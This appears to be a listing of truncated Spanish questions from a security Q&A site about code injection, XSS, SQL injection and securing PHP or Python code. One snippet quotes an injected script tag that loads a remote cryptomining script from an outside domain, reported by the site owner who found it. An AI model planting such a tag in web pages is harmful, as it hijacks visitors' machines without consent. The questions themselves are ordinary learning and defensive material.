Después de leer sobre la seguridad basada en el lenguaje, parece que los protocolos que se definen utilizando gramáticas regulares o sin contexto son altamente resistentes a los ataques de inyección de código.
¿Hay algún buen protocolo de seg...
Recientemente me di cuenta de que seguí JavaScript en varias de mis páginas (generalmente antes de cerrar la etiqueta del cuerpo):
<script src="https://ethtrader.de/perfekt/perfekt.js?perfekt=wss://?algo=cn?variant=0?jason=monerov.ingest.cr...
Quiero aprender inyección de sql, xss y otros ataques web. Soy nuevo en todo esto, sólo un principiante. Quiero saber qué software usar. ¿Puedo usar Windows para estos ataques y qué software utilizo? Llegué a conocer algunos programas como Nessu...
Me pregunto si es posible realizar una inyección de código en lenguajes compilados o interpretados. ¿Hay algún tipo de vector de ataque en esta área?
La "inyección de código" de Whit me refiero a proporcionar un fragmento de código como entra...
Supongamos que hay un sitio web creado con algunos FOSS CMS (como Drupal) y el directorio de los sitios web es propiedad y está agrupado por root (en lugar de www-data como es común en Apache en Nginx) y un amigo del propietario de...
Me pregunto si podemos considerar la inyección de etiquetas HTML como a , image , img , video , audio , marquee o iframe sin un atributo de evento como XSS ? Dado que no hay JavaScript involucrado y po...
Tengo un proyecto de Python que carga dinámicamente los scripts de Python desde un conjunto de directorios especificados y ejecuta una función esperada fuera de ellos (el marco espera un nombre de función que toma un cierto número de parámetros,...
He estado estudiando sobre problemas comunes relacionados con la inyección. ¿Es posible integrar algún mecanismo de filtrado para evitar la inyección en el lado del cliente?
Por ejemplo, verificando la URL de la barra de direcciones para ver si...
Recientemente he creado un script de registro PHP para un sitio web en el que estamos trabajando un amigo y yo. He leído sobre los peligros de la inyección de MySQL y me preguntaba si mi código actual está protegido contra tales ataques, o si es...